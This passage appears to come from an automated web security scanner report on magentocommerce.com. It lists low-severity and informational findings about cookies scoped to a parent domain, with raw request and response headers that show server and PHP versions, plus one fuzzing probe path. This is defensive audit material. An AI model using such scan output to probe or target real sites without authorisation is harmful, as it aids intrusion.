Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sat, 11-Aug-2012 23:49:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170873; expires=Sat, 11-Aug-2012 13:41:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:13 GMT
Content-Length: 35376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.2. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.3. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.4. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.5. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...

3.6. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.7. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.10. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.11. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.12. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.13. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

